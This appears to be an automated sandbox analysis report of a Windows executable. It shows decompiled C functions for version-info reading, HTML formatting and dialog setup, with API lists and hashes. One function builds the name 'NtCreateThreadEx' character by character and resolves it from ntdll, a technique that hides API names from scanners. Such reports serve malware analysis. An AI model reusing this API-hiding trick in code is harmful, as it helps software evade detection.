                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                  				int _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* _v16;
                                                                                                  				int _v20;
                                                                                                  				long _v60;
                                                                                                  				char _v572;
                                                                                                  				void* __esi;
                                                                                                  				int _t47;
                                                                                                  				void* _t50;
                                                                                                  				signed short* _t76;
                                                                                                  				void* _t81;
                                                                                                  				void* _t84;
                                                                                                  				intOrPtr* _t96;
                                                                                                  				int _t97;
                                                                                                  
                                                                                                  				_t96 = __edi;
                                                                                                  				_t97 = 0;
                                                                                                  				_v20 = 0;
                                                                                                  				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                  				_v8 = _t47;
                                                                                                  				if(_t47 > 0) {
                                                                                                  					_t50 = E00405AA7(__edi);
                                                                                                  					_push(_v8);
                                                                                                  					L0040B26C();
                                                                                                  					_t84 = _t50;
                                                                                                  					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                  					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                  						_t81 = _v12;
                                                                                                  						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                  						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                  						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                  						 *__edi =  *_t13;
                                                                                                  						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                  						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                  						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                  						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                  						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                  						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                  						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                  						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                  					}
                                                                                                  					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                  						L5:
                                                                                                  						wcscpy( &_v60, L"040904E4");
                                                                                                  					} else {
                                                                                                  						_t76 = _v16;
                                                                                                  						_push(_t76[1] & 0x0000ffff);
                                                                                                  						_push( *_t76 & 0x0000ffff);
                                                                                                  						_push(L"%4.4X%4.4X");
                                                                                                  						_push(0x14);
                                                                                                  						_push( &_v60);
                                                                                                  						L0040B1EC();
                                                                                                  						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                  							goto L5;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                  					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                  					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                  					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                  					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                  					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                  					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                  					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                  					_push(_t84);
                                                                                                  					_t97 = 1;
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				return _t97;
                                                                                                  			}

















                                                                                                  0x0040b04d
                                                                                                  0x0040b05e
                                                                                                  0x0040b060
                                                                                                  0x0040b063
                                                                                                  0x0040b06a
                                                                                                  0x0040b06d
                                                                                                  0x0040b076
                                                                                                  0x0040b07b
                                                                                                  0x0040b07e
                                                                                                  0x0040b084
                                                                                                  0x0040b08e
                                                                                                  0x0040b0a8
                                                                                                  0x0040b0aa
                                                                                                  0x0040b0ad
                                                                                                  0x0040b0b0
                                                                                                  0x0040b0b3
                                                                                                  0x0040b0b6
                                                                                                  0x0040b0b8
                                                                                                  0x0040b0bb
                                                                                                  0x0040b0be
                                                                                                  0x0040b0c1
                                                                                                  0x0040b0c4
                                                                                                  0x0040b0c7
                                                                                                  0x0040b0ca
                                                                                                  0x0040b0cd
                                                                                                  0x0040b0cd
                                                                                                  0x0040b0e5
                                                                                                  0x0040b11f
                                                                                                  0x0040b128
                                                                                                  0x0040b0e7
                                                                                                  0x0040b0e7
                                                                                                  0x0040b0f1
                                                                                                  0x0040b0f2
                                                                                                  0x0040b0f3
                                                                                                  0x0040b0fb
                                                                                                  0x0040b0fd
                                                                                                  0x0040b0fe
                                                                                                  0x0040b11d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040b11d
                                                                                                  0x0040b13c
                                                                                                  0x0040b151
                                                                                                  0x0040b166
                                                                                                  0x0040b17b
                                                                                                  0x0040b190
                                                                                                  0x0040b1a5
                                                                                                  0x0040b1ba
                                                                                                  0x0040b1cf
                                                                                                  0x0040b1d6
                                                                                                  0x0040b1d7
                                                                                                  0x0040b1d8
                                                                                                  0x0040b1de
                                                                                                  0x0040b1e3

                                                                                                  APIs
                                                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                  • API String ID: 1223191525-1542517562
                                                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                  				char _v8;
                                                                                                  				char _v9;
                                                                                                  				char _v10;
                                                                                                  				char _v11;
                                                                                                  				char _v12;
                                                                                                  				char _v13;
                                                                                                  				char _v14;
                                                                                                  				char _v15;
                                                                                                  				char _v16;
                                                                                                  				char _v17;
                                                                                                  				char _v18;
                                                                                                  				char _v19;
                                                                                                  				char _v20;
                                                                                                  				char _v21;
                                                                                                  				char _v22;
                                                                                                  				char _v23;
                                                                                                  				char _v24;
                                                                                                  				struct HINSTANCE__* _t27;
                                                                                                  
                                                                                                  				if( *__esi != 0) {
                                                                                                  					L3:
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                  				 *__esi = _t27;
                                                                                                  				if(_t27 != 0) {
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosw");
                                                                                                  					asm("stosb");
                                                                                                  					_v24 = 0x4e;
                                                                                                  					_v23 = 0x74;
                                                                                                  					_v13 = 0x65;
                                                                                                  					_v12 = 0x61;
                                                                                                  					_v18 = 0x74;
                                                                                                  					_v17 = 0x65;
                                                                                                  					_v22 = 0x43;
                                                                                                  					_v14 = 0x72;
                                                                                                  					_v11 = 0x64;
                                                                                                  					_v21 = 0x72;
                                                                                                  					_v10 = 0x45;
                                                                                                  					_v9 = 0x78;
                                                                                                  					_v20 = 0x65;
                                                                                                  					_v19 = 0x61;
                                                                                                  					_v16 = 0x54;
                                                                                                  					_v15 = 0x68;
                                                                                                  					_v8 = 0;
                                                                                                  					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                                  					goto L3;
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}





















                                                                                                  0x0040a1f8
                                                                                                  0x0040a26d
                                                                                                  0x00000000
                                                                                                  0x0040a26f
                                                                                                  0x0040a205
                                                                                                  0x0040a20b
                                                                                                  0x0040a20d
                                                                                                  0x0040a213
                                                                                                  0x0040a214
                                                                                                  0x0040a215
                                                                                                  0x0040a216
                                                                                                  0x0040a217
                                                                                                  0x0040a219
                                                                                                  0x0040a21f
                                                                                                  0x0040a223
                                                                                                  0x0040a227
                                                                                                  0x0040a22b
                                                                                                  0x0040a22f
                                                                                                  0x0040a233
                                                                                                  0x0040a237
                                                                                                  0x0040a23b
                                                                                                  0x0040a23f
                                                                                                  0x0040a243
                                                                                                  0x0040a247
                                                                                                  0x0040a24b
                                                                                                  0x0040a24f
                                                                                                  0x0040a253
                                                                                                  0x0040a257
                                                                                                  0x0040a25b
                                                                                                  0x0040a25f
                                                                                                  0x0040a269
                                                                                                  0x00000000
                                                                                                  0x0040a26c
                                                                                                  0x0040a271

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                  • API String ID: 2574300362-1257427173
                                                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 63%
                                                                                                  			E00407F8D(void* __eax) {
                                                                                                  				struct _SHFILEINFOW _v692;
                                                                                                  				void _v1214;
                                                                                                  				short _v1216;
                                                                                                  				void* _v1244;
                                                                                                  				void* _v1248;
                                                                                                  				void* _v1252;
                                                                                                  				void* _v1256;
                                                                                                  				void* _v1268;
                                                                                                  				void* _t37;
                                                                                                  				long _t38;
                                                                                                  				long _t46;
                                                                                                  				long _t48;
                                                                                                  				long _t58;
                                                                                                  				void* _t62;
                                                                                                  				intOrPtr* _t64;
                                                                                                  
                                                                                                  				_t64 = ImageList_Create;
                                                                                                  				_t62 = __eax;
                                                                                                  				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                  					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                  						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                  						 *(_t62 + 0x2a8) = _t48;
                                                                                                  						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                  						_push( *(_t62 + 0x2a8));
                                                                                                  					} else {
                                                                                                  						_v692.hIcon = 0;
                                                                                                  						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                  						_v1216 = 0;
                                                                                                  						memset( &_v1214, 0, 0x208);
                                                                                                  						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                  						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                  						 *(_t62 + 0x2a8) = _t58;
                                                                                                  						_push(_t58);
                                                                                                  					}
                                                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                  				}
                                                                                                  				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                  					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                  					 *(_t62 + 0x2ac) = _t46;
                                                                                                  					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                  				}
                                                                                                  				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                  				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                  				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                  				_v1244 = _t37;
                                                                                                  				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                  				_t38 = GetSysColor(0xf);
                                                                                                  				_v1248 = _t38;
                                                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                  				DeleteObject(_v1268);
                                                                                                  				DeleteObject(_v1268);
                                                                                                  				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                  			}


















                                                                                                  0x00407f9b
                                                                                                  0x00407fa3
                                                                                                  0x00407fad
                                                                                                  0x00407fb9
                                                                                                  0x0040802e
                                                                                                  0x00408032
                                                                                                  0x00408038
                                                                                                  0x0040803e
                                                                                                  0x00407fbb
                                                                                                  0x00407fc9
                                                                                                  0x00407fd0
                                                                                                  0x00407fe0
                                                                                                  0x00407fe5
                                                                                                  0x00407ff7
                                                                                                  0x00408015
                                                                                                  0x0040801b
                                                                                                  0x00408021
                                                                                                  0x00408021
                                                                                                  0x00408051
                                                                                                  0x00408051
                                                                                                  0x00408059
                                                                                                  0x00408065
                                                                                                  0x00408069
                                                                                                  0x0040806f
                                                                                                  0x00408087
                                                                                                  0x00408087
                                                                                                  0x0040809c
                                                                                                  0x004080bb
                                                                                                  0x004080d1
                                                                                                  0x004080de
                                                                                                  0x004080e2
                                                                                                  0x004080ea
                                                                                                  0x004080fb
                                                                                                  0x00408105
                                                                                                  0x00408115
                                                                                                  0x00408121
                                                                                                  0x00408127
                                                                                                  0x00408150

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00407FD0
                                                                                                  • memset.MSVCRT ref: 00407FE5
                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                  • DeleteObject.GDI32(?), ref: 00408121
                                                                                                  • DeleteObject.GDI32(?), ref: 00408127
                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 304928396-0
                                                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 69%
                                                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                  				int _v8;
                                                                                                  				void _v518;
                                                                                                  				long _v520;
                                                                                                  				void _v1030;
                                                                                                  				char _v1032;
                                                                                                  				intOrPtr _t32;
                                                                                                  				wchar_t* _t57;
                                                                                                  				void* _t58;
                                                                                                  				void* _t59;
                                                                                                  				void* _t60;
                                                                                                  
                                                                                                  				_t58 = __esi;
                                                                                                  				_v520 = 0;
                                                                                                  				memset( &_v518, 0, 0x1fc);
                                                                                                  				_v1032 = 0;
                                                                                                  				memset( &_v1030, 0, 0x1fc);
                                                                                                  				_t60 = _t59 + 0x18;
                                                                                                  				_v8 = 1;
                                                                                                  				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                  					_v8 = 0;
                                                                                                  				}
                                                                                                  				_t57 = _a4;
                                                                                                  				 *_t57 = 0;
                                                                                                  				if(_v8 != 0) {
                                                                                                  					wcscpy(_t57, L"<font");
                                                                                                  					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                  					if(_t32 > 0) {
                                                                                                  						_push(_t32);
                                                                                                  						_push(L" size=\"%d\"");
                                                                                                  						_push(0xff);
                                                                                                  						_push( &_v520);
                                                                                                  						L0040B1EC();
                                                                                                  						wcscat(_t57,  &_v520);
                                                                                                  						_t60 = _t60 + 0x18;
                                                                                                  					}
                                                                                                  					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                  					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                  						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                  						_push(L" color=\"#%s\"");
                                                                                                  						_push(0xff);
                                                                                                  						_push( &_v520);
                                                                                                  						L0040B1EC();
                                                                                                  						wcscat(_t57,  &_v520);
                                                                                                  					}
                                                                                                  					wcscat(_t57, ">");
                                                                                                  				}
                                                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                  					wcscat(_t57, L"<b>");
                                                                                                  				}
                                                                                                  				wcscat(_t57, _a8);
                                                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                  					wcscat(_t57, L"</b>");
                                                                                                  				}
                                                                                                  				if(_v8 != 0) {
                                                                                                  					wcscat(_t57, L"</font>");
                                                                                                  				}
                                                                                                  				return _t57;
                                                                                                  			}













                                                                                                  0x0040ae90
                                                                                                  0x0040aeab
                                                                                                  0x0040aeb2
                                                                                                  0x0040aec0
                                                                                                  0x0040aec7
                                                                                                  0x0040aecc
                                                                                                  0x0040aed3
                                                                                                  0x0040aeda
                                                                                                  0x0040aee1
                                                                                                  0x0040aee1
                                                                                                  0x0040aee7
                                                                                                  0x0040aeea
                                                                                                  0x0040aeed
                                                                                                  0x0040aef9
                                                                                                  0x0040aefe
                                                                                                  0x0040af05
                                                                                                  0x0040af07
                                                                                                  0x0040af08
                                                                                                  0x0040af13
                                                                                                  0x0040af18
                                                                                                  0x0040af19
                                                                                                  0x0040af26
                                                                                                  0x0040af2b
                                                                                                  0x0040af2b
                                                                                                  0x0040af2e
                                                                                                  0x0040af34
                                                                                                  0x0040af43
                                                                                                  0x0040af44
                                                                                                  0x0040af4f
                                                                                                  0x0040af54
                                                                                                  0x0040af55
                                                                                                  0x0040af62
                                                                                                  0x0040af67
                                                                                                  0x0040af70
                                                                                                  0x0040af76
                                                                                                  0x0040af7a
                                                                                                  0x0040af82
                                                                                                  0x0040af88
                                                                                                  0x0040af8d
                                                                                                  0x0040af97
                                                                                                  0x0040af9f
                                                                                                  0x0040afa5
                                                                                                  0x0040afa9
                                                                                                  0x0040afb1
                                                                                                  0x0040afb7
                                                                                                  0x0040afbd

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 97%
                                                                                                  			E00403C03(void* __eflags) {
                                                                                                  				void* __ebx;
                                                                                                  				void* __ecx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t88;
                                                                                                  				void* _t108;
                                                                                                  				void* _t113;
                                                                                                  				void* _t119;
                                                                                                  				void* _t121;
                                                                                                  				void* _t122;
                                                                                                  				void* _t123;
                                                                                                  				intOrPtr* _t124;
                                                                                                  				void* _t134;
                                                                                                  
                                                                                                  				_t113 = _t108;
                                                                                                  				E00403B3C(_t113);
                                                                                                  				E00403B16(_t113);
                                                                                                  				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                  				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                  				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                  				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                  				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
                                                                                                  				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                  				 *_t124 = 0x3ea;
                                                                                                  				E0040AD85(GetDlgItem(??, ??));
                                                                                                  				 *_t124 = 0x3f1;
                                                                                                  				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
                                                                                                  				E004049D9(_t49, E00405B81(0x259), 0x20);
                                                                                                  				E004049D9(_t49, E00405B81(0x25a), 0x40);
                                                                                                  				E004049D9(_t116, E00405B81(0x25b), 0x80);
                                                                                                  				E004049D9(_t116, E00405B81(0x25c), 0x100);
                                                                                                  				E004049D9(_t116, E00405B81(0x25d), 0x4000);
                                                                                                  				E004049D9(_t116, E00405B81(0x25e), 0x8000);
                                                                                                  				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
                                                                                                  				E004049D9(_t62, E00405B81(0x26c), 0);
                                                                                                  				E004049D9(_t62, E00405B81(0x26d), 1);
                                                                                                  				E004049D9(_t117, E00405B81(0x26e), 2);
                                                                                                  				E004049D9(_t117, E00405B81(0x26f), 3);
                                                                                                  				_t134 = _t124 + 0x78;
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
                                                                                                  				_t119 = 1;
                                                                                                  				do {
                                                                                                  					_t17 = _t119 + 0x280; // 0x281
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t119 = _t119 + 1;
                                                                                                  				} while (_t119 <= 9);
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
                                                                                                  				_t121 = 1;
                                                                                                  				do {
                                                                                                  					_t21 = _t121 + 0x294; // 0x295
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t121 = _t121 + 1;
                                                                                                  				} while (_t121 <= 3);
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
                                                                                                  				_t122 = 0;
                                                                                                  				do {
                                                                                                  					_t25 = _t122 + 0x2bc; // 0x2bc
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t122 = _t122 + 1;
                                                                                                  				} while (_t122 <= 0xd);
                                                                                                  				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
                                                                                                  				_t123 = 0;
                                                                                                  				do {
                                                                                                  					_t29 = _t123 + 0x2ee; // 0x2ee
                                                                                                  					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
                                                                                                  					_t134 = _t134 + 0xc;
                                                                                                  					_t123 = _t123 + 1;
                                                                                                  					_t143 = _t123 - 3;
                                                                                                  				} while (_t123 < 3);
                                                                                                  				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
                                                                                                  				E00403EC3(GetDlgItem, _t113);
                                                                                                  				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
                                                                                                  				_t88 = E00402D78(_t113, _t143);
